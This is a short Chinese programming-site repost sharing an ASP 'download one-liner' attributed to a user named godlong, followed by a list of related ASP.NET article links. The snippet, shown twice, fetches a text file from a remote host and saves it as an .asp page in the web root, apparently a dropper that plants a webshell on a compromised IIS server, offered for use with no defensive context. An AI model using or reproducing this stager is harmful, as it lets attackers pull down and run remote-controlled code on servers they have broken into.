asp xmlhttp下载一句话
程序员文章站
2022-05-03 12:32:02
分享一下 在3est活动中学习的godlong的 复制代码 代码如下: <% set xpost = createobject("microsoft.xmlhttp"...
分享一下
在3est活动中学习的godlong的
<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","http://www.fxxxx.com/1.txt",0 '下载文件的地址
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile "e:\wwwroot\fuck1.asp",2
%>
在3est活动中学习的godlong的
复制代码 代码如下:
<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","http://www.fxxxx.com/1.txt",0 '下载文件的地址
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile "e:\wwwroot\fuck1.asp",2
%>
推荐阅读
-
asp.net(c#)下Jmai去说明 使用与下载
-
asp.net Web Services上传和下载文件(完整代码)第1/2页
-
asp 利用 xmlhttp 抓取网页内容
-
ASP.NET MVC使用ActionFilterAttribute实现权限限制的方法(附demo源码下载)
-
asp.net MVC利用自定义ModelBinder过滤关键字的方法(附demo源码下载)
-
Asp.net(C#)读取数据库并生成JS文件制作首页图片切换效果(附demo源码下载)
-
asp.net MVC利用自定义ModelBinder过滤关键字的方法(附demo源码下载)
-
ASP.NET MVC使用ActionFilterAttribute实现权限限制的方法(附demo源码下载)
-
Asp.net(C#)读取数据库并生成JS文件制作首页图片切换效果(附demo源码下载)
-
ASP.NET Web Api 2实现多文件打包并下载文件的实例